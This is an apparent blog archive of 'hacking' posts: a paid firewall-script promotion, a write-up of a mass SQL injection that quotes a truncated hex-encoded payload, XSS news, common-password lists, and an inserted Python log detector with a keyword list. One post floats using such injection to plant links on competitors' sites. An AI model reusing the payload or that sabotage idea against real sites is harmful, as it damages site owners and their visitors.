Archive for the ‘hacking’ Category

Firewall Script Affiliate Program opens its doors

Wow, things are moving fast. I think that the recent WordPress exploits helped, and the fact we were just on Techcrunch can’t harm either. So, for the affiliate program, we are going to give you $19.99 USD just for signing up to the Affiliate Program.

Commissions will be Pay-Per-Sale: $40.00 USD for each sale you deliver. The minimum balance required for payout is $100 USD.

Any issues or information, just drop me a line.

DaveN
Payments are made once per month, for the previous month.

600,000 backlinks in one go

That’s what just happened: a massive SQL injection was discovered (written up on F-Secure; hat tip to 0x000000, I found it there). I wonder how many people’s computers just got malware on them.

But imagine, in a controlled manner, you could destroy websites’ rankings by adding 50,000 links to all your competitors.

From F-Secure:

Unless that data is sanitized before it gets saved you can’t control what the website will show to the users. This is what SQL injection is all about, exploiting weaknesses in these controls. In this case the injection code starts off like this (note, this is not the complete code):

DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x440045004300
4C00410052004500200040005400200076006100720063006800610072
00280032003500350029002C0040004300200076006100720063006800
610072002800320035003500290020004400450043004C004100520045
0020005400610062006C0065005F0043007500720073006F0072002000
43005500520053004F005200200046004F0052002000730065006C0065
0063007400200061002E006E0061006D0065002C0062002E006E006100
6D0065002000660072006F006D0020007300790073006F0062006A0065
00630074007300200061002C0073007900730063006F006C0075006D00
6E00730020006200200077006800650072006500200061002E00690064
003D0062002E0069006400200061006E006400200061002E0078007400
7900700065003D00270075002700200061006E0064002000280062002E
00780074007900700065003D003900390020006F007200200062002E00
780074007900700065003D003300350020006…

Which when decoded becomes:

DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor
CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b
where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35
or b…

What happens as a result? It finds all text fields in the database and adds a link to malicious javascript to each and every one of them which will make your website display them automatically. So essentially what happened was that the attackers looked for ASP or ASPX pages containing any type of querystring (a dynamic value such as an article ID, product ID, et cetera) parameter and tried to use that to upload their SQL injection code.

Is this a good time to mention Firewall Script again?

Dave
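As an added example (not code from the original post or from F-Secure’s write-up), here is a small Python detector that applies the pattern described above to web-server request lines: it URL-decodes the request, pulls out the CAST(0x…) literal, decodes the UTF-16LE hex so an analyst can read what it would have run, and flags the cursor/sysobjects keywords. The sample request lines, the products.asp path and the SUSPICIOUS keyword list are constructed for this example.

```python
import re
from urllib.parse import unquote

# Keywords whose presence in a decoded payload matches the cursor-driven
# "add a script link to every text column" attack F-Secure describes.
SUSPICIOUS = ("DECLARE", "CURSOR", "SYSOBJECTS", "SYSCOLUMNS", "EXEC")
# The page's own payload shape: ...CAST(0x<hex>... with UTF-16LE text inside.
CAST_HEX = re.compile(r"CAST\s*\(\s*0x([0-9A-Fa-f]+)", re.IGNORECASE)

def decode_cast_hex(hexdigits: str) -> str:
    """Decode a 0x... literal as UTF-16LE (what NVARCHAR holds). A capture cut
    off mid-payload (odd nibble or odd byte count) is trimmed, not rejected."""
    if len(hexdigits) % 2:
        hexdigits = hexdigits[:-1]
    raw = bytes.fromhex(hexdigits)
    if len(raw) % 2:
        raw = raw[:-1]
    return raw.decode("utf-16-le", errors="replace")

def inspect_request(request_line: str) -> dict:
    """URL-decode a request line, pull out every CAST(0x...) hex literal,
    decode it, and report which injection keywords it carries."""
    decoded_url = unquote(request_line)
    payloads = [decode_cast_hex(h) for h in CAST_HEX.findall(decoded_url)]
    hits = sorted({kw for p in payloads for kw in SUSPICIOUS if kw in p.upper()})
    return {"suspicious": bool(hits), "keywords": hits, "payloads": payloads}

# Constructed sample requests: a normal product-page hit, and the same
# querystring carrying the fragment quoted above, hex-encoded the way the
# post shows it and cut off mid-byte like the truncated capture.
FRAGMENT = ("DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor "
            "CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b")
HEX_FRAGMENT = FRAGMENT.encode("utf-16-le").hex().upper()[:-3]
BENIGN = "GET /products.asp?id=42 HTTP/1.1"
ATTACK = ("GET /products.asp?id=42;DECLARE%20@S%20NVARCHAR(4000);"
          "SET%20@S=CAST(0x" + HEX_FRAGMENT + " HTTP/1.1")

if __name__ == "__main__":
    for line in (BENIGN, ATTACK):
        print(inspect_request(line))
```

Run it over real access logs by feeding each request line to inspect_request; the decoded payload is what to hand to whoever owns the affected ASP page, and the fix on that page is a parameterised query rather than a string built from the querystring.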

Firewall Script

OK, one of my wife’s favourite sayings at the moment is “busy idiots”: basically you are busy all the time but never focused enough to get things done. I have been looking at different open source solutions to stop 0-day exploits and XSS hacks, and in fairness there are quite a few open source products out there, but the time and effort setting them up is just crazy, so I have decided to do a deal with Firewall Script. We are going to be including it in all our new WordPress client installs. I really like this product a lot; it’s easy to install and set up, so easy Dan almost did it here .. lol..

Anyway, I want your points of view on it. The cost is just over £40; is it worth it? I mean, have you ever tried to install modsecurity on a shared hosting platform?

Dave

Barack Obama Website Hacked !!

Well, it was an XSS exploit in the community section of Barack Obama’s site; the exploit redirected users to Hillary Clinton’s. I guess it could have been worse: it could have just downloaded malware.

How can such high profile sites keep getting hacked? Come on, web masters, firewall up!!

DaveN

Top 10 passwords 2008

I just had a client send me a password, which I have told them they need to change. What made me laugh was Becky, my wife, said “it’s better than the old password”, which was password .. lol. Then that reminded me of the top 10 passwords ..
Dark Reading had these top 10 passwords:

1. (username)
2. (username)123
3. 123456
4. password
5. 1234
6. 12345
7. passwd
8. 123
9. test
10. 1

Threadwatch had these in 2007:

1. password
2. 123456
3. qwerty
4. abc123
5. letmein
6. monkey
7. myspace1
8. password1
9. blink182
10. (your first name)

modern life is rubbish has a UK list from 2006:

1. 123
2. password
3. liverpool
4. letmein
5. 123456
6. qwerty
7. charlie
8. monkey
9. arsenal
10. thomas

But across Europe the top 10 is still:

1. Password
2. 12345
3. Football Club
4. Partners Name
5. letmein
6. Monkey
7. Own name
8. 1234
9. Qwerty
10. First school or Colour

And people wonder why their blogs get hacked!!

DaveN

NO Tech Hacking - Johnny Long

Thanks to the Hacker Webzine 0x000000.com, they posted up a video presentation by Johnny Long.

Seriously, check it out in your lunch hour … so funny and yet so TRUE! Video here. If you don’t know who Johnny Long is, shame on you: he did the Google Hacking Database.

DaveN
